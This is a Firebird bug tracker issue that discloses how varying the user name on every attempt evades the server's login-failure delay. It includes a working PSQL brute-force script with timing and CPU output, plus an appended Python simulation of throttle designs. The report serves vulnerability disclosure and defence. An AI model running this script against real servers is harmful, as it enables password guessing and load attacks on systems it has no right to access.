Remove the ability to make a brute-force attack that will *not* be forced to wait between its iterations
----------------------------------------------------------------------------------------------------

                 Key: CORE-4192
                 URL: http://tracker.firebirdsql.org/browse/CORE-4192
             Project: Firebird Core
          Issue Type: Task
          Components: Security
    Affects Versions: 3.0 Alpha 1
            Reporter: Pavel Zotov

There is an ability to make a brute-force attack that will *not* be forced to wait between its iterations.
It seems that for such an attack the user name on iteration N+1 must always be distinct from all user names previously used on steps 1, 2, ..., N.

DDL:
####
-- empty database, alias = 'empty30':
create sequence hackgen;
create table hacklog(
    id bigint primary key,
    dtsbeg timestamp,
    dtsend timestamp,
    delay_ms computed by ( datediff( millisecond from dtsbeg to dtsend ) )
);
commit;

Script that can start a brute-force attack without being forced to wait ~8 seconds:
##########################
delete from hacklog;
commit;
alter sequence hackgen restart with 0;
commit;

set term ^;
execute block returns(id int, f01 int) as
    declare host varchar(128) = '192.168.99.44/3330:empty30';
    declare stt varchar(255) = 'select id, f01 from t30 rows 3'; -- no matter what the table name is here: we will always use a wrong usr/psw
    declare usr varchar(255);
    declare psw varchar(255);
    declare v_id bigint;
    declare v_cnt int = 50000;
begin
    while (v_cnt > 0) do
    begin
        begin
            in autonomous transaction do
                insert into hacklog(id, dtsbeg) values( gen_id(hackgen, 1), 'now' ) returning id into v_id;

            -- a user name and password that were never used before:
            usr = rpad( '', 8, uuid_to_char(gen_uuid()) );
            psw = rpad( '', 8, uuid_to_char(gen_uuid()) );

            for
                execute statement (:stt)
                on external (:host)
                as user :usr password :psw
                into :id, :f01
            do
                suspend;
            leave;
        when any do
            begin
                in autonomous transaction do
                    update hacklog set dtsend = 'now' where id = :v_id;
            end
        end
        v_cnt = v_cnt - 1;
    end
end^
set term ;^
commit;

select x.*
      ,datediff(second from attack_begin to attack_final) attack_seconds
from (
    select min(dtsbeg) attack_begin, max(dtsbeg) attack_final
    from hacklog
) x;

set width id 6;
select cast(id as varchar(6)) id, dtsbeg, dtsend, delay_ms, count(*)over() total_tries
from hacklog h
order by delay_ms desc
rows 5;
commit;
Result:
######
ATTACK_BEGIN              ATTACK_FINAL              ATTACK_SECONDS
========================= ========================= =====================
2013-08-25 15:45:12.4170  2013-08-25 16:25:06.2580                   2394

ID     DTSBEG                    DTSEND                    DELAY_MS              TOTAL_TRIES
====== ========================= ========================= ===================== =====================
31301  2013-08-25 16:08:09.2340  2013-08-25 16:08:09.9700                   736                 50000
44960  2013-08-25 16:20:15.5130  2013-08-25 16:20:16.1530                   640                 50000
48901  2013-08-25 16:24:01.7380  2013-08-25 16:24:02.3500                   612                 50000
20824  2013-08-25 15:59:33.6890  2013-08-25 15:59:34.2610                   572                 50000
46878  2013-08-25 16:22:07.6870  2013-08-25 16:22:08.2560                   569                 50000

So, the maximum pause between iterations of the brute-force attack was less than 1 second.
This contrasts with the variant where the user name is defined at compile time (e.g. 'U30') OR even evaluated in some "strange" manner like 'U' || LEFT(CAST( 30 + rand() AS VARCHAR(32) ), 2) etc. - these will be forced to wait every 4..5 iterations for ~8 seconds.

PS. The `firebird` process will load the CPU during the whole time of this attack:

Tasks: 120 total,   1 running, 119 sleeping,   0 stopped,   0 zombie
Cpu0  : 19.3%us,  3.1%sy,  0.0%ni, 62.2%id, 15.1%wa,  0.0%hi,  0.3%si,  0.0%st
Cpu1  :  2.0%us,  0.3%sy,  0.0%ni, 97.0%id,  0.7%wa,  0.0%hi,  0.0%si,  0.0%st
Cpu2  : 11.4%us,  1.5%sy,  0.0%ni, 77.4%id,  9.3%wa,  0.0%hi,  0.3%si,  0.0%st
Cpu3  :  1.3%us,  0.0%sy,  0.0%ni, 96.4%id,  2.3%wa,  0.0%hi,  0.0%si,  0.0%st
Cpu4  :  0.0%us,  0.0%sy,  0.0%ni,100.0%id,  0.0%wa,  0.0%hi,  0.0%si,  0.0%st
Cpu5  :  4.3%us,  0.3%sy,  0.0%ni, 94.7%id,  0.7%wa,  0.0%hi,  0.0%si,  0.0%st
Cpu6  :  0.3%us,  0.0%sy,  0.0%ni, 99.7%id,  0.0%wa,  0.0%hi,  0.0%si,  0.0%st
Cpu7  :  6.0%us,  0.6%sy,  0.0%ni, 83.2%id, 10.2%wa,  0.0%hi,  0.0%si,  0.0%st
Mem:   4056652k total,   919884k used,  3136768k free,   138908k buffers
Swap: 16383996k total,        0k used, 16383996k free,   248888k cached

  PID USER      PR  NI  VIRT  RES  SHR S %CPU %MEM    TIME+  COMMAND
 6281 firebird  20   0 1701m 283m 8876 S 56.9  7.2  27:54.25 firebird
 6280 firebird  20   0 28184  980  644 S  0.0  0.0   0:00.00 fbguard

Firebird-Devel mailing list, web interface at https://lists.sourceforge.net/lists/listinfo/firebird-devel
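The throttling behaviour the report describes (a forced wait of roughly 8 seconds after every 4..5 failed attempts, apparently counted per user name) can be modelled to show why a never-before-seen name on each attempt defeats it, and why keying the counter on the connecting client instead closes that gap. The simulation below is an added example written for this page; it is not Firebird code and does not reflect how the server actually implements the delay. The threshold of 4, the 8-second stall, the `by_user` and `by_source` key functions, and the client address 192.0.2.10 are all assumptions or constructed values.

```python
"""Model of a failed-login throttle keyed on different attributes (added example, not Firebird code)."""

# Assumed parameters, taken from the behaviour the report observes, not from Firebird's source:
FAIL_THRESHOLD = 4      # failed attempts that trigger a stall (report: "every 4..5 iterations")
DELAY_SECONDS = 8.0     # length of the stall (report: "~8 seconds")


def by_user(user, source):
    """Throttle key for the weak design: only the user name counts, so a fresh name starts at zero."""
    return user


def by_source(user, source):
    """Throttle key for the hardened design: the connecting client counts, whatever name it sends."""
    return source


class FailedLoginThrottle:
    """Counts failed attempts per key; once FAIL_THRESHOLD is reached the attempt is stalled and the
    counter for that key is reset, which reproduces the 'wait every N iterations' pattern."""

    def __init__(self, key_func):
        self.key_func = key_func
        self.failures = {}

    def stall_for(self, user, source):
        """Record one failed attempt and return the stall (seconds) imposed on it."""
        key = self.key_func(user, source)
        count = self.failures.get(key, 0) + 1
        if count >= FAIL_THRESHOLD:
            self.failures[key] = 0
            return DELAY_SECONDS
        self.failures[key] = count
        return 0.0


def simulate(throttle, attempts):
    """Replay failed (user, source) attempts; returns (total stall seconds, number of stalled attempts)."""
    total = 0.0
    stalled = 0
    for user, source in attempts:
        stall = throttle.stall_for(user, source)
        total += stall
        if stall > 0:
            stalled += 1
    return total, stalled


def constructed_attempts(n, fresh_name_each_time):
    """Constructed stream of n failed attempts from one client (the address is a documentation-range value)."""
    source = "192.0.2.10"
    if fresh_name_each_time:
        # analogous to the report's rpad('', 8, uuid_to_char(gen_uuid())): a name never seen before
        return [("u%08x" % i, source) for i in range(n)]
    return [("U30", source)] * n   # the compile-time name the report says does get throttled


if __name__ == "__main__":
    for label, key_func, fresh in [
        ("by user,   fixed name ", by_user, False),
        ("by user,   fresh names", by_user, True),
        ("by source, fresh names", by_source, True),
    ]:
        total, stalled = simulate(FailedLoginThrottle(key_func), constructed_attempts(50, fresh))
        print("%s: %2d stalled attempts, %5.1f s of forced waiting" % (label, stalled, total))
```

With 50 attempts the per-user throttle stalls a fixed name 12 times (96 s of waiting) but never stalls a stream of fresh names, which is the gap the report measures; keying on the source restores the 12 stalls regardless of the names sent. A real deployment would combine this with a global failed-login budget and network-level rate limiting, since a distributed attacker can vary the source as easily as the name.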